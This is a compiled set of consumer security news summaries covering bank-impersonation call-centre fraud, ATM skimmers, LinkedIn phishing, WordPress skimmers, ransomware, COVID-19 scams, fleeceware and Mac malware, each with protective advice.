Inside a scammers’ lair: Ukraine busts 40 in fake bank call-centre raid

It looks like the sort of meeting room you might find in startups all over the world: diffuse lighting from windows down one wall, alongside a giant poster cityscape of New York’s Brooklyn Bridge, with the Manhattan skyline towering behind it.

The difference in this case is that that the computer workstations around the room are there for a different sort of “entrepreneurial” venture, and the room is empty not because no one showed up for work, but because the “employees” were in the process of being arrested.

This picture comes from the Ukraine Cyber Police, who raided a fraudulent call center just before New Year, where they say the three founders of the scam, plus 37 “staff”, were busted for allegedly operating a large-scale banking fraud.

Playbook + gift of gab = scam
You’re probably familiar with the scamming script they’re said to have used, and you probably know friends or family who have been pestered by scammers of this sort.

Some of you may even have acquaintances who were ripped off this way, because these scammers are well versed in gaining the trust of their victims.

Typically, the scammers try to convince you that your bank account is under attack from fraudsters (technically, that part is true – the caller is the attacker), and patiently offer to help you “secure” your account and “recover” lost or at-risk funds.

The scammers aim to turn people’s general awareness of banking scams into an excuse, a reason, a playbook, if you like, for carrying out a scam of their own.

Simply put, they call up pretending to be an official from your own bank, using a variety of tricks to make you accept their fictitious credentials as bank staff, and then “advise” you to take a series of disastrous steps.

The scammers’ first job is to convince you that a hacker has already gained access to your account.

The crooks typically use a mix of threatening, scary and urgent language, combined with the sort of attentiveness that you probably wish more call centre staff would show.

Even if you decide to call them back (don’t do it – you’re only reconnecting to the person who just called you, which proves nothing!), you’ll almost certainly find the scammers more prompt and more helpful than you’ve experienced in a long time when calling a real support line…

…so we’re not surprised that this sort of caller makes some people feel comfortable enough to keep on listening, even if they didn’t believe a word at first.

If in doubt, don’t give it out
As you can imagine, once the crooks know you’re starting to believe their cover story, they’ll start to milk you for personal information, often by pretending that they can see it for themselves on the “banking screen” in front of them, yet somehow always coaxing you to say it out loud first.

At that point, of course, they do know the information you just let slip, and they’ll pretend to “confirm” it or to “double-check” it to keep up the pretence.

There are then many ways that the crooks can defraud you or drain your account.

Sometimes, they may simply convince you to login on a fake “security” site as they coach you through the process, including getting you to go through any 2FA (two-factor authentication) process.

The Ukrainian call centre that just got busted seems to have worked that way, with victims being “helpfully” guided through the process of “cancelling” transactions that, in fact, never happened in the first place [automated translation]:

[These scammers] called people in Kazakhstan, pretending to be employees of the security service of banks. These people were notified of suspicious transactions and told that alleged outsiders had gained access to their accounts. Under the guise of “cancelling” transactions, victims were persuaded to provide financial data.

After receiving such information, the perpetrators transferred the victims’ money to account under their own control. They also issued quick loans and appropriated the loan amount.

For the conspiracy, the participants used bank accounts located in offshore zones, and cryptocurrency wallets.

In this way, the criminals defrauded [about 18,000 people].

High and dry
In other scams – this approach, unfortunately, is widely reported in the UK – the crooks present you with a brand-new account number, based at the same bank, which they announce is your “replacement account”.

The idea is that you’re being provided with new account details in the same way that if you were to ask for a new credit card due to fraud, it too would have a brand new number, expiry date and so on.

The crooks then convince you to transfer the funds from your “old, hacked” account to this new one, leading you to believe that the account was created by the bank minutes ago, especially for the purpose of “protecting” you from an active attack.

Of course, this “new account” is just a regular account that was opened recently by accomplices of the crooks, perhaps using fraudulent documentation to pass the bank’s know-your-customer (KYC) process.

So, the account it is already directly under the control of the scammers, and the money will typically be whisked out of that “new” account even before you finish the call.

In cases like this, victims sometimes tragically find themselves left high and dry by their bank, which may claim that because they apparently willingly transferred the funds of their own accord, and properly identified themselves to the online banking system (for example by using 2FA), the funds have technically not been “stolen”, and the bank therefore has no liability.

  • What to do?
  • Never believe anyone who contacts you out of the blue and claims to be “helping” you with a fraud investigation. That person isn’t stopping a fraud, they are starting one.
  • Never use contact details given to you by the other person when cybersecurity is at stake. This cannot possibly prove anything, given that the details probably came from a scammer in the first place. All you get is a false sense of “security”.
  • Never rely on the Caller ID number that shows up on your phone. The number that appears can easily be faked. If the caller tells you to “check the number if you don’t believe them”, you can be sure they’re a scammer.
  • Never let yourself be talked into handing over personal information, especially not to “prove” your identity. After all, it’s the other person who should be proving themselves to you. Visit your bank in person if you possibly can; if you need to call or interact online, look for contact details printed on something you know you received directly from the bank, such as the back of your payment card or a recent statement.
  • Never transfer funds to another account on someone else’s say so. You bank will never call you to ask you to do this, so any call of this sort must be a scam. Worse still, you could find yourself liable for the transfer if you approve it yourself, even if you were tricked into doing so.
  • Look out for friends and family who may be vulnerable. These scammers don’t give up easily, and they can be consummate actors when playing the role of a helpful official. Make sure your friends and family know to hang up right away, and to contact you personally for advice, so they never give the scammers a chance to “vouch” for themselves.

Source: https://nakedsecurity.sophos.com/2023/01/03/inside-a-scammers-lair-ukraine-busts-40-in-fake-bank-call-centre-raid/

Say Hello to Crazy Thin ‘Deep Insert’ ATM Skimmers

A number of financial institutions in and around New York City are dealing with a rash of super-thin “deep insert” skimming devices designed to fit inside the mouth of an ATM’s card acceptance slot. The card skimmers are paired with tiny pinhole cameras that are cleverly disguised as part of the cash machine. Here’s a look at some of the more sophisticated deep insert skimmer technology that fraud investigators have recently found in the wild.

This ultra thin and flexible “deep insert” skimmer recently recovered from an NCR cash machine in New York is about half the height of a U.S. dime. The large yellow rectangle is a battery. Image: KrebsOnSecurity.com.

The insert skimmer pictured above is approximately .68 millimeters tall. This leaves more than enough space to accommodate most payment cards (~.54 mm) without interrupting the machine’s ability to grab and return the customer’s card. For comparison, this flexible skimmer is about half the height of a U.S. dime (1.35 mm).

These skimmers do not attempt to siphon chip-card data or transactions, but rather are after the cardholder data still stored in plain text on the magnetic stripe on the back of most payment cards issued to Americans.

Here’s what the other side of that insert skimmer looks like:

The other side of the deep insert skimmer. Image: KrebsOnSecurity.com.

The thieves who designed this skimmer were after the magnetic stripe data and the customer’s 4-digit personal identification number (PIN). With those two pieces of data, the crooks can then clone payment cards and use them to siphon money from victim accounts at other ATMs.

To steal PINs, the fraudsters in this case embedded pinhole cameras in a false panel made to fit snugly over the cash machine enclosure on one side of the PIN pad.

Pinhole cameras were hidden in these false side panels glued to one side of the ATM, and angled toward the PIN pad. Image: KrebsOnSecurity.com.

The skimming devices pictured above were pulled from a brand of ATMs made by NCR called the NCR SelfServ 84 Walk-Up. In January 2022, NCR produced a report on motorized deep insert skimmers, which offers a closer look at other insert skimmers found targeting this same line of ATMs.

Here are some variations on deep insert skimmers NCR found in recent investigations:

Image: NCR.

Image: NCR

The NCR report included additional photos that show how fake ATM side panels with the hidden cameras are carefully crafted to slip over top of the real ATM side panels.

Image: NCR.

Sometimes the skimmer thieves embed their pinhole spy cameras in fake panels directly above the PIN pad, as in these recent attacks targeting a similar NCR model:

Image: NCR

In the image below, the thieves hid their pinhole camera in a “consumer awareness mirror” placed directly above an ATM retrofitted with an insert skimmer:

Image: NCR

The financial institution that shared the images above said it has seen success in stopping most of these insert skimmer attacks by incorporating a solution that NCR sells called an “insert kit,” which it said stops current insert skimmer designs. NCR also is conducting field trials on a “smart detect kit” that adds a standard USB camera to view the internal card reader area, and uses image recognition software to identify any fraudulent device inside the reader.

Skimming devices will continue to mature in miniaturization and stealth as long as payment cards continue to hold cardholder data in plain text on a magnetic stripe. It may seem silly that we’ve spent years rolling out more tamper- and clone-proof chip-based payment cards, only to undermine this advance in the name of backwards compatibility. However, there are a great many smaller businesses in the United States that still rely on being able to swipe the customer’s card.

Many newer ATM models, including the NCR SelfServ referenced throughout this post, now include contactless capability, meaning customers no longer need to insert their ATM card anywhere: They can instead just tap their smart card against the wireless indicator to the left of the card acceptance slot (and right below the “Use Mobile Device Here” sign on the ATM).

For simple ease-of-use reasons, this contactless feature is now increasingly prevalent at drive-thru ATMs. If your payment card supports contactless technology, you will notice a wireless signal icon printed somewhere on the card — most likely on the back. ATMs with contactless capabilities also feature this same wireless icon.

Once you become aware of ATM skimmers, it’s difficult to use a cash machine without also tugging on parts of it to make sure nothing comes off. But the truth is you probably have a better chance of getting physically mugged after withdrawing cash than you do encountering a skimmer in real life.

So keep your wits about you when you’re at the ATM, and avoid dodgy-looking and standalone cash machines in low-lit areas, if possible. When possible, stick to ATMs that are physically installed at a bank. And be especially vigilant when withdrawing cash on the weekends; thieves tend to install skimming devices on Saturdays after business hours — when they know the bank won’t be open again for more than 24 hours.

Lastly but most importantlycovering the PIN pad with your hand defeats one key component of most skimmer scams: The spy camera that thieves typically hide somewhere on or near the compromised ATM to capture customers entering their PINs.

Shockingly, few people bother to take this simple, effective step. Or at least, that’s what KrebsOnSecurity found in this skimmer tale from 2012, wherein we obtained hours worth of video seized from two ATM skimming operations and saw customer after customer walk up, insert their cards and punch in their digits — all in the clear.

Source: https://krebsonsecurity.com/2022/09/say-hello-to-crazy-thin-deep-insert-atm-skimmers/

Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry

The phishing attacks are spoofing LinkedIn to target ‘Great Resignation’ job hunters, who are also being preyed on by huge data-scraping bot attacks.

Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the “Great Resignation” in full swing, cybercriminals are having an easy time finding their next victim.

Just since Feb. 1, analysts have watched phishing email attacks impersonating LinkedIn surge 232 percent, attempting to trick job seekers into giving up their credentials.

“Current employment trends help to make this attack more convincing,” a new report from Egress said. “‘The Great Resignation’ continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.”

The emails had subject lines that would be enticing to job hunters hoping to get noticed, like, “Who’s searching for you online,” “You appeared in 4 searches this week” or even “You have 1 new message,” the Egress team said.

The phishing emails themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.

Even the email’s footer lifted the company’s headquarters’ address and included “unsubscribe” links to add to the email’s authenticity, the analysts pointed out.

“You can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,” the report said.

Once the victim clicks on the malicious links in the email, they were directed to a site to harvest their LinkedIn logins and passwords.

“While the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,” the analysts added. “Currently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.”

021722 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:

“Our internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on two-step verification. To learn more about how members can identify phishing messages, see our Help Center here.”

Read more: https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/

Hackers infect random WordPress plugins to steal credit cards

Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.

With the Christmas shopping season in full swing, card-stealing threat actors raise their efforts to infect online shops with stealthy skimmers, so administrators ought to remain vigilant.

The latest trend is injecting card skimmers into WordPress plugin files, avoiding the closely-monitored ‘wp-admin’ and ‘wp-includes’ core directories where most injections are short-lived.

According to a new report by Sucuri, hackers performing credit card theft are first hacking into WordPress sites and injecting a backdoor into the website for persistence.

Full article at https://www.bleepingcomputer.com/news/security/hackers-infect-random-wordpress-plugins-to-steal-credit-cards/

Ransomware Payments Explode Amid ‘Quadruple Extortion’

Two reports slap hard figures on what’s already crystal clear: Ransomware attacks have skyrocketed, and ransomware payments are the comet trails that have followed them skyward.

The average ransomware payment spiked 82 percent year over year: It’s now over half a million dollars, according to the first-half 2021 update report put out by Palo Alto Networks’ Unit 42. As far as the sheer multitude of attacks goes, Barracuda researchers on Thursday reported that they’ve identified and analyzed 121 ransomware incidents so far in 2021, a 64 percent increase in attacks, year-over-year.

Obviously, these are just the major incidents. It is unclear from these reports if the threat to small sites or individual consumers’ computers has continued at the same rate as previously now that there are so many attacks occurring against “big payout” targets.

It’s important to continue to be vigilant on all levels: keep backups (both on site and off site), be careful about what you click on, watch for phishing and consent phishing, use 2-factor authentication where offered, etc.

Full article at https://threatpost.com/ransomware-payments-quadruple-extortion/168622/

Update: Comedian John Oliver (Last Week Tonight) did a piece on Ransomware on Aug 16. (NSFW, but quite well researched.)

Google: Phishing and malware attacks are evolving

Coronavirus-themed phishing lures are still on the rise, particularly in certain geographic locations – but most are being stopped before they reach your inbox.

Cyber criminals are tailoring coronavirus-related phishing and malware attacks to make them more effective at targeting victims in certain locations around the world, even as attackers continue to distribute millions of malicious spam emails every single day.

Google Cloud has detailed how the past month has seen the emergence of regional hotspots for COVID-19-related cyberattacks, with the UK, India and Brazil all seeing a rise in malware, phishing and spam campaigns looking to exploit fears over the virus.

In each case, the attacks and scams are using regionally relevant lures such as supposed government advice in an effort to reel victims in.

One example targeting people in the UK masquerades as an email from the Small Business Grant fund, a government imitative to help small businesses get through coronavirus. These attacks, which often involve a malicious file or phishing link, are designed to trick the victim into giving up personal information, as well as financial details.

Full article: https://www.zdnet.com/article/google-heres-how-phishing-and-malware-attacks-are-evolving/

Definition: Fleeceware

Fleeceware:  Apps which are marketed as “free”, but which then trick the user into subscribing for paid services (which are available free elsewhere), often for excessive fees.

Common examples are horoscope apps, QR code or barcode scanners, and face filter apps targeted at younger users. Publishers of fleeceware target users who may be less cognizant or sensitive to initial fees and reoccurring charges.

Often users are hooked in by free trials, which turn out to be difficult to extricate yourself from after the “free” period has lapsed.

These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.

COVID-19: Hackers Exploit “Fearware” to Target Victims

We’ve all heard about the guy in Tennessee who bought 17,000 bottles of hand sanitizer, then tried to sell them at highly inflated prices.

Some people are going to try to make a buck off anything that happens, without regard to the rest of society.  Hackers and scammers are some of those kind of people, and they’re playing the COVID-19 fears just like they do any other opportunity they find.

So it’s no surprise that we’re seeing reports of multiple COVID-19 related scams.

One form of attack involves well-crafted phishing emails that appear to come from health authorities but instead contain malicious software that can steal a person’s data or hijack their device. Be sure that the source is real, and are who they say they are.

One hacking attack saw Russian-language criminals share an interactive map of coronavirus infections and deaths, which had originally been created by John Hopkins University to offer real-time information about the pandemic. Anyone opening the map sent by the hackers would be infected by a form of password-stealing malware that had been hidden within the map.

Fake websites, phishing emails, and malware-laden “tools” abound, so be careful where you go and what you open.

https://arstechnica.com/information-technology/2020/03/the-internet-is-drowning-in-covid-19-related-malware-and-phishing-scams/

https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/

https://www.independent.co.uk/life-style/gadgets-and-tech/news/coronavirus-hackers-covid-19-china-fearware-malware-a9400141.html

https://www.darktrace.com/en/blog/how-antigena-email-caught-a-fearware-attack-that-bypassed-the-gateway/

https://www.webarxsecurity.com/covid-19-cyber-attacks/

https://threatpost.com/hackers-hijack-routers-to-spread-malware-via-coronavirus-apps/154170/

 

Why You Shouldn’t Use Free Versions of Paid Plugins or Themes!

Full article: An inside look at WP-VCD, today’s largest WordPress hacking operation

According to the folks at WordFence, the worst malware threat out there for WordPress sites comes from a series of sites hawking free versions of premium (paid) plugins and themes.  Here’s their basic modus operandi:

They offer compromised plugins and themes for free to unsuspecting webmaster who think they’re getting a great deal.

Those plugins/themes then insert backlinks and otherwise promote the source sites of the hacked goods, improving their search engine ranking and thus increasing their likelihood of being found and guaranteeing a continuous stream of victims.

They immediately insert malicious code into any other themes the site has available, so even if the pirated theme isn’t in use, the active theme gets infected.

So now they have a self-generating network of infected sites, and they use them to run malware ads (their income source).

WordPress site owners should keep in mind that when something is free, then “you’re the product” — in this case, your site, which has now been corralled into a cybercrime operation.

See also the original WordFence report.

10% of All Macs Shlayered

Many people think that malware only targets Windows and that Macs are safe, but a new report shows how a single Apple malware called Shlayer has attacked over 10% of all Apple computers monitored by an antivirus company.

Instead of distributing the Shlayer Trojan via phishing attacks or through other malware, the threat actors focus on trending events or popular shows and then build fake web sites surrounding them.

Apple users visit these fake sites through search results, links in YouTube videos, and even links in Wikipedia articles. When visiting these sites, instead of being greeted with a video to watch, they are told they need to first update Flash Player.

These Flash Player updates, though, are the Shlayer Trojan and when executed will install a malware cocktail onto the computer.

When browsing the web, if any site states that you must install an update to watch a video or perform an activity, immediately leave that site.

Source:  https://www.bleepingcomputer.com/news/security/10-percent-of-all-macs-shlayered-malware-cocktail-served/

More at: https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/